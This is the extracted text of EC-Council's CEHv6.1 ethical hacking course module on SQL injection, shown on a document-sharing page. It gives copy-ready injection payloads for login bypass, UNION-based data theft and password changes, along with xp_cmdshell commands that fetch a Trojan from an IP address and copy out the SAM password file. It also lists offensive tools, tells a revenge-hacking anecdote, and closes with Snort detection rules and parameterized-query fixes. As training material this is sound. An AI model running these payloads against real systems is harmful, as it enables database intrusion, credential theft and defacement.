0% found this document useful (0 votes)

156 views77 pages

CEHv6.1 Module 19 SQL Injection

SQL

Uploaded by

Mer Liss

We take content rights seriously. If you suspect this is your content, claim it here.

Available Formats

Download as PDF, TXT or read online on Scribd

0% found this document useful (0 votes)

156 views77 pages

CEHv6.1 Module 19 SQL Injection

SQL

Uploaded by

Mer Liss

We take content rights seriously. If you suspect this is your content, claim it here.

Available Formats

Download as PDF, TXT or read online on Scribd

You are on page 1/ 77

Ethical Hacking and

Countermeasures
Version 6.1

Mod le XIX
Module
SQL Injection

Scenario

Susan was an SQL programmer with a reputed firm. She

ordered an expensive anniversary gift for her husband
from ee-shopping4u
shopping4u.com,
com which was a lesser-known
lesser known online
shopping portal but was offering better deals, and was
promised delivery on anniversary day. She wanted to give
her husband a surprise gift. She was upset on the
anniversary
i
day
d as the
h gift
if she
h ordered
d d was not d
delivered.
li
d
She tried to contact the portal but in vain. After several
failed attempts to contact the portal, she thought of taking
revenge out of frustration.
frustration
What do you think, as an SQL programmer, Susan can do?

EC-Council

News

EC-Council

Source: http://www.scmagazineus.com/ Copyright by EC-Council

Module Objective
This module will familiarize you with:
SQL Injection
Steps for performing SQL Injection
SQL Injection Techniques
SQL Injection in Oracle
SQL Injection in MySql
Attacking
k
SQL servers
Automated Tools for SQL Injection
Countermeasures
EC-Council

Module Flow
SQL Injection

SQL Injection in MySql

Steps for performing SQL Injection

Attacking SQL servers

SQL Injection Techniques

Automated Tools for SQL Injection

SQL Injection in Oracle

Countermeasures

EC-Council

SQL Injection: Introduction

EC-Council

What is SQL Injection

SQL injection is a type of security exploit in which the attacker "injects"
Structured Query Language (SQL) code through a web form input box
box, to gain
access to resources, or make changes to data
It is a technique
q of injecting
j
g SQL
Q commands to exploit
p
non-validated input
p
vulnerabilities in a web application database backend
Programmers
g
use sequential
q
commands with user input,
p , making
g it easier for
attackers to inject commands

Att k
Attackers
can execute
t arbitrary
bit
SQL commands
d through
th
h the
th web
b application
li ti

EC-Council

Exploiting Web Applications

SQL injection exploits web applications using clientsupplied
li d sqll queries
i
It enables an attacker to execute unauthorized SQL
commands
d
It also takes advantage
g of unsafe q
queries in web
applications and builds dynamic SQL queries
For example, when a user logs onto a web page by using a
user name and password for validation,
validation a SQL query is
used
However, the attacker can use SQL injection to send
specially
i ll crafted
ft d user name and
d password
d fi
fields
ld th
thatt
poison the original SQL query
EC-Council

SQL Injection Steps

What do you need?
Any web browser

Input validation attack occurs here on a website

EC-Council

What Should You Look For

Try to look for pages that allow a user to submit data, for example: a log in
page, search
h page, feedback,
f db k etc.
Look for HTML pages that use POST or GET commands
If POST is used, you cannot see the parameters in the URL
Check the source code of the HTML to get information
For example, to check whether it is using POST or GET, look for the <Form>
tag in the source code:
<Form action=search.asp method=post>
<input type=hidden name=X value=Z>
</Form>

EC-Council

What If It Doesnt Take Input

Iff input
i
is
i not given,
i
check
h k for
f pages like
lik ASP,
AS JSP,
S CGI,
CG or PHP

Check the URL that takes the following parameters:

Example:
http:// www.xsecurity.com /index.asp?id=10

In the above example, attackers might attempt:

http://www.xsecurity.com/index.asp?id=blah or 1=1-EC-Council

OLE DB Errors
The user-filled fields are enclosed by a single quotation mark ('). To test, try
using
i (') as the
h user name
The following error message will be displayed when a (') is entered into a form
that is vulnerable
ulnerable to an SQL injection attack

If you get this error, then the website is vulnerable to an SQL injection attack
EC-Council

Input Validation Attack

Input validation attack occurs here on a website

EC-Council

SQL Injection Techniques

Authorization
bypass

Bypassing log on
forms

Using the SELECT

command

Used to retrieve data

from the database

Using the INSERT

command

Used to add
information to the
database

SQL Injection
techniques:

Using SQL server

stored procedures

EC-Council

How to Test for SQL Injection

Vulnerability
Use a single quote in the input:
blah or 1=1
Login:blah
Login:blah or 1=1
1 1
Password:blah or 1=1
http://search/index.asp?id=blah or 1=1--

Depending
di on the
h query, try the
h ffollowing
ll i
possibilities:
or 1=1- or 1=1- or a=a
or a=a
) or (
(a=a)
)
)

EC-Council

How Does it Work

Attacker breaks into the system by injecting malformed SQL into the query
Original SQL Query:
strQry = "SELECT Count(*) FROM Users WHERE UserName='" + txtUser.Text + "'
AND Password='" + txtPassword.Text + "'";

In the case of the user entering a valid user name of "Paul"

and a password of "password", strQry becomes:
SELECT Count(*) FROM Users WHERE UserName='Paul' AND Password='password'

But when the attacker enters ' Or 1=1 --, the query now
becomes:
SELECT Count(*) FROM Users WHERE UserName='' Or 1=1 --' AND Password=''

Because a pair of hyphens designates the beginning of a

comment in SQL, the query becomes simply:
SELECT Count(*) FROM Users WHERE UserName='' Or 1=1

EC-Council

BadLogin.aspx.cs

This code is vulnerable to an SQL Injection Attack

private void cmdLogin_Click(object sender, System.EventArgs e) {

Attack Occurs Here

string
t i
strCnx
t C
=
"server=localhost;database=northwind;uid=sa;pwd=;";
SqlConnection cnx = new SqlConnection(strCnx);
cnx.Open();
//This code is susceptible to SQL injection attacks.
string strQry = "SELECT Count(*) FROM Users WHERE UserName='" +
txtUser.Text + "' AND Password='" + txtPassword.Text + "'";
int intRecs;
SqlCommand cmd = new SqlCommand(strQry, cnx);
intRecs = (int) cmd.ExecuteScalar();
if (intRecs>0) {
FormsAuthentication.RedirectFromLoginPage(txtUser.Text, false);
}
else {
lblMsg.Text = "Login attempt failed.";
}
cnx Close();
cnx.Close();
}

EC-Council

BadProductList.aspx.cs

This code is vulnerable to an SQL Injection Attack

private void cmdFilter_Click(object sender, System.EventArgs e) {
g
g
= 0;
dgrProducts.CurrentPageIndex
bindDataGrid();
}
private void bindDataGrid() {
dgrProducts.DataSource = createDataView();
dgrProducts.DataBind();
}

Attack Occurs Here

private DataView createDataView() {

string strCnx =
"server=localhost;uid=sa;pwd=;database=northwind;";
string strSQL = "SELECT ProductId, ProductName, " +
"QuantityPerUnit, UnitPrice FROM Products";
//This code is susceptible to SQL injection attacks.
if (txtFilter.Text.Length > 0) {
strSQL += " WHERE ProductName LIKE '" + txtFilter.Text + "'";
}
SqlConnection cnx = new SqlConnection(strCnx);
SqlDataAdapter sda = new SqlDataAdapter(strSQL, cnx);
DataTable dtProducts = new DataTable();
sda.Fill(dtProducts);
return dtProducts.DefaultView;
}

EC-Council

Executing Operating System

Commands
Use stored procedures like master..xp_cmdshell to perform
remote execution
Execute any OS commands
blah;exec master..xp
p_cmdshell insert OS command
here --

Ping a server
blah;exec
bl h
master..xp_cmdshell
t
d h ll ping
i
10
10.10.1.2
10 1 2 --

Directory listing
blah
blah;exec
;exec master..xp_cmdshell
master xp cmdshell dir
dir c:\*
c:\ .* /s >
c:\directory.txt --

Create a file
blah;exec master..xp_cmdshell echo juggyboy-was-here
> c:\juggyboy.txt EC-Council

Executing Operating System

Commands (cont
(contd)
d)
Defacing a web page (assuming that write access is
allowed due to misconfiguration)
blah;exec master..xp_cmdshell echo you-are-defaced >
c:\inetpub\www.root\index.htm -

Execute applications (only non-gui

non gui app)
blah;exec master..xp_cmdshell cmd.exe /c appname.exe --

Upload a Trojan to the server

blah;exec master..xp_cmdshell tftp i 10.0.0.4 GET trojan.exe
c:\trojan.exe --

Download a file from the server

blah ;exec master..xp_cmdshell
blah;exec
master xp cmdshell tftp
tftp i
i 10.0.0.4
10 0 0 4 put
c:\winnt\repair\SAM SAM --

EC-Council

Getting Output of SQL Query

Use sp_makewebtask
sp makewebtask to write a query into an HTML

Example
blah;EXEC master..sp_makewebtask
\\
\\10.10.1.4\share\creditcard.html,
\ h \ dit d ht l
SELECT * FROM CREDITCARD
The above command exports a table called credit card, to the
attackers network share

EC-Council

Getting Data from the Database

Using ODBC Error Message
Using UNION keyword
http://xsecurity.com/index.asp?id=10 UNION
SELECT TOP 1 TABLE_NAME FROM
INFORMATION SCHEMA.TABLES-INFORMATION_SCHEMA.TABLES
To retrieve information from the above query, use:
SELECT TOP 1 TABLE_NAME FROM
INFORMATION_SCHEMA.TABLES--

Using LIKE keyword

http:// xsecurity.com /index.asp?id=10 UNION SELECT
TOP 1 TABLE FROM INFORMATION_SCHEMA.TABLES WHERE
TABLE_NAME LIKE %25LOGIN%25--

EC-Council

How to Mine all Column Names

of a Table
To map out all the column names of a table, type:

http://xsecurity.com/index.asp?id=10 UNION SELECT TOP 1

COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE
TABLE_NAME=admin_login-

To get to the next column name, use NOT IN( )

http:// xsecurity.com /index.asp?id=10 UNION SELECT TOP

1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE
TABLE_NAME=admin_login
g
WHERE COLUMN_NAME NOT
IN(login_id)-EC-Council

How to Retrieve any Data

To get the login_name from the
admin_login
login table:
admin
http:// xsecurity.com /index.asp?id=10 UNION
SELECT TOP 1 login_name FROM admin_login--

From above, you get login_name of

the admin_user:

To get the password for

login name=yuri
login_name=
yuri - http// xsecurity.com /index.asp?id=10 UNION
SELECT TOP 1 password FROM admin_login where
l i
login_name=yuri-
i

EC-Council

How to Update/Insert Data into

Database
After gathering
Af
h i all
ll off column
l
names off a table,
bl iit iis possible
ibl to UPDATE
or INSERT records into it:
Example to change the password for yuri:
http:// xsecurity.com /index.asp?id=10; UPDATE admin_login
SET password = newboy5 WHERE login_name=yuri--

To INSERT a record:

http:// xsecurity.com /index.asp?id=10; INSERT

INTOadmin_login(login_id,login_name,password,details)
VALUES(111,yuri2,newboy5,NA)--

EC-Council

SQL Injection in Oracle

SQL Injection in Oracle can be

performed as follows:
UNIONS can be added to the existing statement to execute a
second statement
SUBSELECTS can be added to the existing statements
Data Definition Language (DDL) can be injected if DDL is used in
a dynamic SQL string
INSERTS, UPDATES, and DELETES can also be injected
Anonymous
A
PL/SQL
/SQ block
bl k iin procedures
d

EC-Council

SQL Injection in MySql Database

It is not easy to perform SQL injection in a MySql database

While coding with a MySql application, the injection vulnerability is not

exploited
l i d

Itt iss d
difficult
cu t to ttrace
ace tthee output

You can see an error because the value retrieved is passed on to multiple
queries with different numbers of columns before the script ends
In such situations, SELECT and UNION commands cannot be used

EC-Council

SQL Injection in MySql Database

(cont d)
(contd)
For example:
F
l consider
id a d
database
t b
pizza:
http://www.xsecurity.com/pizza/index.php?a=post&s=reply&t=1'
To show the tables, type the query:
mysql> SHOW TABLES;
To see the current user:
mysql> SELECT USER();
The following query shows the first byte of Admin's Hash:
mysql> SELECT SUBSTRING(user_password,1,1)FROM
mb_users WHERE user_g
group
p = 1;
The following query shows the first byte of Admin's Hash as an ASCII number:
mysql> SELECT ASCII('5');

EC-Council

SQL Injection in MySql Database

(cont d)
(contd)
Preparing the GET Request
Req est
To inject SQL commands successfully, the request from any single quotes should be
cleaned
mysql> Select active_id FROM mb_active UNION SELECT
IF(SUBSTRING(user_password,1, 1) = CHAR(53), BENCHMARK(1000000,
MD5(CHAR(1))), null) FROM mb_users WHERE user_group = 1;

Exploiting the Vulnerability

First,
i
log
l iin as a registered
i
d user with
i h the
h rights
i h to reply
l to the
h current thread
h d
http://127.0.0.1/pizza/index.php?a=post&s=reply&t=1 UNION
SELECT IF (SUBSTRING(user_password,1,1) = CHAR(53),
BENCHMARK(1000000, MD5(CHAR(1))), null), null, null, null, null
FROM mb_users
mb users WHERE user_group
user group = 1/*
1/
You will see a slow down, because the first byte is CHAR(53), 5
EC-Council

Attack Against SQL Servers

Techniques
q
Involved:
Understand SQL Server and extract the necessary
information from the SQL Server Resolution Service
List of servers by Osql-L probes
Sc.exe sweeping of services
Port scanning
Use of commercial alternatives
EC-Council

SQL Server Resolution Service

(SSRS)
SSRS service is responsible for sending a response packet containing the
connection details of clients who send a specially formed request

The packet contains the details necessary to connect to the desired instance,
including the TCP port

The SSRS has buffer overflow vulnerabilities that allow remote attackers to
overwrite portions of the systems memory and execute arbitrary codes

EC-Council

Osql L- Probing

Osql L- Probing is a command-line utility provided by Microsoft with SQL

Server 2000, that allows the user to issue queries to the server

Osql.exe includes a discovery switch (-L) that will poll the network looking
for other installations of SQL Server

It returns a list of server names and instances, but without details about TCP
ports or netlibs

EC-Council

SQL Injection Tools

EC-Council

SQL Injection Automated Tools

SQLDict
SqlExec
SQLbf
SQLSmack
SQL2.exe
AppDetective
Database Scanner
SQLPoke
Q
NGSSQLCrack
NGSSQuirreL
SQLPing v2.2
EC-Council

Hacking Tool: SQLDict

SQLdict is a dictionary attack tool for SQL
Server

It tests if the accounts are strong enough to

resist an attack

Source: http://ntsecurity.nu/cgi-bin/download/sqldict.exe.pl

EC-Council

Hacking Tool: SQLExec

This tool executes commands on compromised Microsoft SQL Servers by using xp_cmdshell
p
stored procedure
It uses a default sa account with a NULL password
USAGE: SQLExec www.target.com

Source: http://phoenix.liu.edu/

EC-Council

SQL Server Password Auditing

Tool: sqlbf
sqlbf tool is used to audit the strength of Microsoft SQL Server passwords offline
The tool can be used either in Brute-Force mode or in Dictionary attack mode
The performance on a 1GHZ pentium (256MB) machine is about 750,000 guesses/sec
To be able to perform an audit, the password hashes that are stored in the sysxlogins table
in the master database are needed
The hashes are easy to retrieve, although a privileged account is needed. The query to use
would be:
select name, password from master..sysxlogins

To perform a dictionary attack on the retrieved hashes:

sqlbf -u hashes.txt -d dictionary.dic -r out.rep

EC-Council

Hacking Tool: SQLSmack

SQLSmack is a Linux-based remote command execution for MSSQL

When provided with a valid user name and password, the tool permits the
execution of commands on a remote MS SQL Server, by piping them through
the stored procedure master..xp_cmdshell

EC-Council

Hacking Tool: SQL2.exe

SQL2 is an UDP Buffer Overflow Remote Exploit hacking tool

EC-Council

sqlmap
sqlmap is an automatic SQL injection tool developed in Python
It performs an extensive database management system back-end
fingerprint
Features:

Retrieves remote DBMS databases

Retrieves usernames, tables, and columns
Enumerates the entire DBMS
Reads system files

It supports two SQL injection techniques:

Blind SQL Injection
Inband SQL injection, also known as UNION query SQL Injection
EC-Council

sqlmap: Screenshot 1

Enumerate Database Management System Users

EC-Council

sqlmap: Screenshot 2

Test for SQL injection on POSTed data

EC-Council

sqlmap: Screenshot 3

Test for SQL Injection and DBMS back-end Detection

EC-Council

sqlninja
Sqlninja is a tool targeted to exploit SQL Injection vulnerabilities on a
web
b application
l
It p
performs the following:
g
Fingerprints the remote SQL Server (version, user performing the
queries, user privileges, xp_cmdshell availability, and DB Server
authentication mode)
Bruteforces the 'sa' password
Privilege escalation to 'sa'
Creates a custom xp_cmdshell if the original one has been disabled
Uploads executables
Reverses scan in order to look for a port that can be used for a reverse
shell
Directs and reverses shell, both TCP and UDP
DNS tunneled pseudoshell,
pseudoshell when no ports are available for a bindshell

EC-Council

Sqlninja: Screenshot 1

EC-Council

Sqlninja: Screenshot 2

EC-Council

Sqlninja: Screenshot 3

EC-Council

Sqlninja: Screenshot 4

EC-Council

Sqlninja: Screenshot 5

EC-Council

Sqlninja: Screenshot 6

EC-Council

SQLIer
SQLIer takes a vulnerable URL and attempts
to determine all necessaryy information to
exploit SQL Injection vulnerability by itself,
requiring no users interaction
It can build
b ld a UNION SELECT query
designed to brute force passwords out of
database
To operate, this script does not use quotes
in the exploit

An 8 character password takes

approximately 1 minute to crack
EC-Council

SQLIer: Screenshot

EC-Council

Automagic SQL Injector

Automagic SQL Injector is an automated SQL injection tool designed to
save time
ti
in
i penetration
t ti ttesting
ti
It is only designed to work with vanilla Microsoft SQL injection holes
where
h
errors are returned
d

F
Features:

EC-Council

Browses tables and dumps table data to a CSV file

U l d files
Uploads
fil using
i the
h d
debug
b script
i method
h d
Comprises of Automagical UDP reverse shell
Has interactive xp_cmdshell (simulated cmd.exe shell)

Automagic SQL Injector:

Screenshot 1

EC-Council

Automagic SQL Injector:

Screenshot 2

EC-Council

Absinthe
Absinthe is a GUI-based tool that automates the process of downloading
the
h schema
h
and
d contents off a d
database
b
that
h iis vulnerable
l
bl to Bli
Blind
d SQL
Injection

Features:

EC-Council

Has automated
H
t
t d SQL iinjection
j ti
Supports MS SQL Server, MSDE, Oracle, and Postgres
Has cookies / Additional HTTP Headers
Comprises
p
of q
queryy termination
Additional text appended to queries
Supports use of proxies / proxy rotation
Has multiple filters for page profiling
Has custom delimiters
Copyright by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited

Absinthe: Screenshot

EC-Council

Blind SQL Injection

EC-Council

Blind SQL Injection

Blind SQL injection is a hacking method that allows an
unauthorized attacker to access a database server
It is facilitated by a common coding blunder: program
accepts data from a client and executes SQL queries without
validating the clients input
Attacker is then free to extract, modify, add, or delete
content from the database
Attackers typically test for SQL injection vulnerabilities by
sending application input that would cause server to
generate an invalid SQL query
EC-Council

Blind SQL Injection:

Countermeasures
To secure an application against SQL injection, developers must never allow
the client-supplied
client supplied data to modify the syntax of the SQL statements
The best protection is to isolate the web application from SQL
All SQL statements required by the application should be in stored
procedures and kept on a database server
Application should execute stored procedures using a safe interface such as
JDBCs CallableStatement or ADOs Command Object
If arbitrary statements must be used, use PreparedStatements
Both PreparedStatements and stored procedures compile the SQL
SQLss
statement before the users input is added, making it impossible to modify the
actual SQL statement
EC-Council

Blind SQL Injection: Screenshot

EC-Council

Blind SQL Injection Schema

EC-Council

SQL Injection Countermeasures

EC-Council

SQL Injection Countermeasures

Selection of Regular Expressions

Regular expressions for detection of SQL meta characters are:

/(\%27)|(\')|(\-\-)|(\%23)|(#)/ix

In the above example, the regular expression would be added to the

snort rule as follows:
alert tcp $EXTERNAL_NET
_
any -> $HTTP_SERVERS
_
$HTTP_PORTS
_
(msg:"SQL Injection - Paranoid";
flow:to_server,established;uricontent:".pl";pcre:"/(\%27)|(\')|
(\-\-)|(%23)|(#)/i"; classtype:Web-application-attack;
sid:9099;
rev:5;)
</TD<
tr>character, it will not be encoded by the
Since
# is not
an HTML
meta

browser
EC-Council

SQL Injection Countermeasures

(cont d)
(contd)
The modified regular expressions for detection of SQL meta characters
are:

/((\%3D)|(=))[^\n]*((\%27)|(\')|(\-\-)|(\%3B)|(;))/i

The regular expressions for a typical SQL injection attack are:

/\w*((\%27)|(\'))((\%6F)|o|(\%4F))((\%72)|r|(\%52))/ix
\w* -zero or more alphanumeric or underscore characters
(\%27)|\' -the ubiquitous single-quote or its hex equivalent
the word or
or with various combinations of
(\%6F)|o|(\%4F))((\%72)|r|(\%52) -the
its upper and lower case hex equivalents
EC-Council

SQL Injection Countermeasures

(cont d)
(contd)
The regular
g
expressions
p
for detecting
g an SQL
Q injection
j
attack using
g
UNION as a keyword:

/((\%27)|(\'))union/ix
(\%27)|(\')) - the single quote and its hex equivalent
(\%27)|(\
union - the keyword union
The above expression can be used for SELECT, INSERT, UPDATE, DELETE,
and DROP keywords

The regular expressions for detecting SQL injection attacks on a MS

SQL server:

//exec(\s|\+)+(s|x)p\w+/ix
(\ |\ ) ( | ) \
/i
exec -the keyword required to run the stored or extended procedure
(\s|\+)+ -one or more white spaces, or their HTTP encoded equivalents
(s|x)p -the letters sp or xp to identify stored or extended procedures,
respectively
i l
\w+ -one or more alphanumeric or underscore characters to complete the name of
the procedure
Copyright by EC-Council
All
Rights
Reserved.
Reproduction
is Strictly Prohibited
EC-Council

Preventing SQL Injection

Attacks
Minimize the privileges of database connections
Disable the verbose error messages
Protect the system account sa

Audit source codes:

EC-Council

Escape single quotes

Preventing SQL Injection Attacks

(cont d)
(contd)
Never trust the users
user s input
Validate all textbox entries using validation controls, regular expressions, code etc.

Never use dynamic SQL

Use parameterized SQL or stored procedures

Never connect to a database using an admin-level account

Use a li
limited
i d access account to connect to the
h d
database
b

Do not store secrets in plain text

Encrypt
yp or hash p
passwords and other sensitive data;; yyou should also encrypt
yp the
connection strings

Exceptions should divulge minimal information

Do not reveal much information in error messages; use custom errors to display
minimal information in the event of an unhandled error; set debug to false
EC-Council

GoodLogin.aspx.cs
private void cmdLogin_Click(object sender, System.EventArgs e) {
string strCnx = ConfigurationSettings.AppSettings["cnxNWindBad"];
using (SqlConnection cnx = new SqlConnection(strCnx))
{
SqlParameter prm;
cnx.Open();
string strQry =
"SELECT Count(*) FROM Users WHERE UserName=@username " +
@p
;
"AND Password=@password";
int intRecs;
SqlCommand cmd = new SqlCommand(strQry, cnx);
cmd.CommandType= CommandType.Text;
prm = new SqlParameter("@username",SqlDbType.VarChar,50);
prm.Direction=ParameterDirection.Input;
prm.Value = txtUser.Text;
cmd.Parameters.Add(prm);
prm = new SqlParameter("@password",SqlDbType.VarChar,50);
prm.Direction=ParameterDirection.Input;
prm.Value = txtPassword.Text;
cmd.Parameters.Add(prm);
intRecs = (int) cmd.ExecuteScalar();
if (intRecs>0) {
FormsAuthentication.RedirectFromLoginPage(txtUser.Text, false);
}
else {
lblMsg.Text = "Login attempt failed.";
}
}
}

EC-Council

SQL Injection Blocking Tool: SQLBlock

http://www.sqlblock.com

SQLBlock is an ODBC/JDBC driver with a

patent pending SQL injection prevention
feature

It works as an ordinary ODBC/JDBC data

so ce and it monito
source,
monitorss eevery
e SQL statement
being executed
If the client application tries to execute any
un-allowed SQL statements, it blocks the
execution and sends an alert to the
administrator

EC-Council

SQLBlock: Screenshot

EC-Council

Acunetix Web Vulnerability

Scanner
Acunetix Web scanner can
detect and report any SQL
Injection vulnerabilities

Other features include:

Cross site scripting / XSS

vulnerabilities
l
biliti
Google hacking vulnerabilities

Source: http://www.acunetix.com

EC-Council

What Happened Next

Susan searched the Internet for security vulnerabilities of a portal.
By chance, she got an online forum listing SQL vulnerabilities of eshopping4u.com. A SQL programmer herself, she crafted an SQL
statement and inserted that in place of user name in their
registration form. And to her surprise, she was able to bypass all
input validations.
She could now access databases of e-shopping4u.com and play
with thousands of their customers records consisting of credit card
and
d other
h personall iinformation.
f
i
L
Losses to e-shopping4u.com
h
i
could
ld
be devastating.

EC-Council

Summary
SQL injection is an attack methodology that targets the data residing in
a database
d b
It attempts to modify the parameters of a web-based application in
order to alter the SQL statements that are parsed, in order to retrieve
data from the database
Database footprinting is the process of mapping the tables on the
database and is a crucial tool in the hands of an attacker
database,
Exploits occur due to coding errors as well as inadequate validation
checks
Prevention involves enforcing better coding practices and database
administration procedures
EC-Council

EC-Council

SQL Injection
No ratings yet
SQL Injection
32 pages
Final Year Project
No ratings yet
Final Year Project
18 pages
Install Lantek
67% (3)
Install Lantek
39 pages
Ethics - Lect6 - SQL Injection
No ratings yet
Ethics - Lect6 - SQL Injection
19 pages
Chapt5 OWASP SQL XSS EH
No ratings yet
Chapt5 OWASP SQL XSS EH
29 pages
Presentation On SQL Injection
No ratings yet
Presentation On SQL Injection
19 pages
About SQL
No ratings yet
About SQL
48 pages
Ethical Hacking v10: Module 13 - SQL Injection
0% (1)
Ethical Hacking v10: Module 13 - SQL Injection
43 pages
003aprac02 - SQL Injection
No ratings yet
003aprac02 - SQL Injection
9 pages
Session 1 Web Application Security
No ratings yet
Session 1 Web Application Security
83 pages
SQL Injection
100% (1)
SQL Injection
28 pages
Guru99 Security Testing
No ratings yet
Guru99 Security Testing
9 pages
Quick Guide To SQL Injection Attacks and Defenses - English
No ratings yet
Quick Guide To SQL Injection Attacks and Defenses - English
31 pages
SQL Injection
No ratings yet
SQL Injection
9 pages
SQL Injection Tutorial
0% (1)
SQL Injection Tutorial
21 pages
Lab Task 1 Dis 2019
No ratings yet
Lab Task 1 Dis 2019
3 pages
What Is A SQL Injection?
No ratings yet
What Is A SQL Injection?
6 pages
3 - SQLInjection
No ratings yet
3 - SQLInjection
18 pages
SQL Injection
100% (3)
SQL Injection
28 pages
Tracking Down App Security
No ratings yet
Tracking Down App Security
69 pages
SQL - Injctions Loop Joks
No ratings yet
SQL - Injctions Loop Joks
35 pages
Sqli Attacks
No ratings yet
Sqli Attacks
149 pages
SQL Injection
No ratings yet
SQL Injection
37 pages
10.web Application Security-SQL Injection
No ratings yet
10.web Application Security-SQL Injection
42 pages
SQL Injection
No ratings yet
SQL Injection
37 pages
CNIT 129S: Securing Web Applications: CH 9: Attacking Data Stores Part 2 of 2
No ratings yet
CNIT 129S: Securing Web Applications: CH 9: Attacking Data Stores Part 2 of 2
66 pages
SQL, SQL Injection, SQLi Types, Impact and Preventions
No ratings yet
SQL, SQL Injection, SQLi Types, Impact and Preventions
13 pages
Experiment 4
No ratings yet
Experiment 4
4 pages
SQL Injection, Are Your Web Applications Vulnerable
No ratings yet
SQL Injection, Are Your Web Applications Vulnerable
31 pages
SQL Injection Bypassing WAF - OWASP Foundation
No ratings yet
SQL Injection Bypassing WAF - OWASP Foundation
11 pages
W11-Attacking Data Stores
No ratings yet
W11-Attacking Data Stores
33 pages
Wvs Singles Can
No ratings yet
Wvs Singles Can
1,007 pages
Web Tutor
No ratings yet
Web Tutor
17 pages
SQ L Injection 1
No ratings yet
SQ L Injection 1
26 pages
Hax
100% (1)
Hax
5 pages
Reference 1 - 2017
No ratings yet
Reference 1 - 2017
13 pages
SQL Injection Presentation by Vivek Pancholi
No ratings yet
SQL Injection Presentation by Vivek Pancholi
13 pages
SQL Injection Attack Lab (TASK-4) Sai Ram
No ratings yet
SQL Injection Attack Lab (TASK-4) Sai Ram
8 pages
Muhfat Alam 23708281 Lab3
No ratings yet
Muhfat Alam 23708281 Lab3
13 pages
Interview Preparation Part-1
No ratings yet
Interview Preparation Part-1
53 pages
Unit 4 Dbmss
No ratings yet
Unit 4 Dbmss
6 pages
SQL Injection: Are Your Web Applications Vulnerable?
No ratings yet
SQL Injection: Are Your Web Applications Vulnerable?
32 pages
SQL Injection
100% (1)
SQL Injection
10 pages
Web Application Security - SQL Injection Attacks: For Example
No ratings yet
Web Application Security - SQL Injection Attacks: For Example
2 pages
SQL Injection
No ratings yet
SQL Injection
22 pages
SQLi
No ratings yet
SQLi
32 pages
SQL Injection Cheat Sheet
No ratings yet
SQL Injection Cheat Sheet
6 pages
Is Presentation Sqli
No ratings yet
Is Presentation Sqli
23 pages
Manual SQL Injection
No ratings yet
Manual SQL Injection
14 pages
SQL Injection
100% (3)
SQL Injection
22 pages
Lecture 8 Database Security
No ratings yet
Lecture 8 Database Security
34 pages
02 SQL Injection
No ratings yet
02 SQL Injection
33 pages
Comprehensive New Https PHP
No ratings yet
Comprehensive New Https PHP
19 pages
SQL Injection
No ratings yet
SQL Injection
22 pages
Some Tutorials in Computer Networking Hacking
From Everand
Some Tutorials in Computer Networking Hacking
Dr. Hidaia Mahmood Alassouli
No ratings yet
Sql Injection Best Method for Begineers
From Everand
Sql Injection Best Method for Begineers
Kishor Sarkar X
No ratings yet
NoSQL Injection for Elasticsearch
From Everand
NoSQL Injection for Elasticsearch
Gary Drocella
No ratings yet
Visual Basic 2010 Coding Briefs Data Access
From Everand
Visual Basic 2010 Coding Briefs Data Access
Kevin Hough
5/5 (1)
C# 2010 Coding Briefs Data Access
From Everand
C# 2010 Coding Briefs Data Access
Kevin Hough
No ratings yet
C++ for Game Developers: Building Scalable and Robust Gaming Applications
From Everand
C++ for Game Developers: Building Scalable and Robust Gaming Applications
Jarrel E.
No ratings yet
Study Guide Cisco 300-735 SAUTO Automating and Programming Cisco Security Solutions Exam
From Everand
Study Guide Cisco 300-735 SAUTO Automating and Programming Cisco Security Solutions Exam
Anand Vemula
No ratings yet
A Mini Project Report On (Size 16) Attendence Management System
No ratings yet
A Mini Project Report On (Size 16) Attendence Management System
29 pages
SQL Server 2022 Administration Inside Out 1st Edition Randolph West Complete Edition
No ratings yet
SQL Server 2022 Administration Inside Out 1st Edition Randolph West Complete Edition
145 pages
The Impacts of The Summer Monsoons in India
No ratings yet
The Impacts of The Summer Monsoons in India
3 pages
Shaik Simal Ahmed: Mobile: +919000851841
No ratings yet
Shaik Simal Ahmed: Mobile: +919000851841
2 pages
New Update Resume 5 Years Exp
No ratings yet
New Update Resume 5 Years Exp
4 pages
Ayesha
No ratings yet
Ayesha
3 pages
Jenkins - INSTALLATION IN UBUNTU 16.04:: Open Terminal Sudo Apt-Get Update && Sudo Apt-Get Install Curl
No ratings yet
Jenkins - INSTALLATION IN UBUNTU 16.04:: Open Terminal Sudo Apt-Get Update && Sudo Apt-Get Install Curl
6 pages
Online Film Ticket Booking
100% (1)
Online Film Ticket Booking
44 pages
Yassmin Mohamed Gamal C.V
No ratings yet
Yassmin Mohamed Gamal C.V
3 pages
Setup SQL Cluster r2 Failover Cluster in Vmware Workstation 7
100% (1)
Setup SQL Cluster r2 Failover Cluster in Vmware Workstation 7
89 pages
ADF Pre-Requisites
No ratings yet
ADF Pre-Requisites
22 pages
pl-300 3
No ratings yet
pl-300 3
56 pages
Tivoli Monitoring For Databases Microsoft SQL Server Agent
No ratings yet
Tivoli Monitoring For Databases Microsoft SQL Server Agent
168 pages
SQL & MSBI Developer
No ratings yet
SQL & MSBI Developer
4 pages
ADAM-6700 - Node-Red Application Tutorial & Example
No ratings yet
ADAM-6700 - Node-Red Application Tutorial & Example
29 pages
Database Systems Lab Manual
No ratings yet
Database Systems Lab Manual
137 pages
Tech Note 1010 - SQL Server Authentication and ArchestrA Network Account Restrictions When Installing Wonderware Historian
No ratings yet
Tech Note 1010 - SQL Server Authentication and ArchestrA Network Account Restrictions When Installing Wonderware Historian
8 pages
How To Insert Update Delete Search Display Images in SQL Database Using
No ratings yet
How To Insert Update Delete Search Display Images in SQL Database Using
7 pages
GMS 4.07 Installation Guide v1.0
No ratings yet
GMS 4.07 Installation Guide v1.0
60 pages
AlwaysOn Availability Groups Creation
No ratings yet
AlwaysOn Availability Groups Creation
11 pages
Sms Based System Scheduling, Project Report
100% (1)
Sms Based System Scheduling, Project Report
52 pages
WP Uf Tcp-Udp Ports of Uniflow - V1.7
No ratings yet
WP Uf Tcp-Udp Ports of Uniflow - V1.7
10 pages
SQL SERVER 2017 Developer Edition - Installation Guide
No ratings yet
SQL SERVER 2017 Developer Edition - Installation Guide
33 pages
Best Practices For Running Dassault Systèmes ENOVIA On SQL Server 2008
No ratings yet
Best Practices For Running Dassault Systèmes ENOVIA On SQL Server 2008
42 pages
Extended ECM Family 22.3 Release Notes
No ratings yet
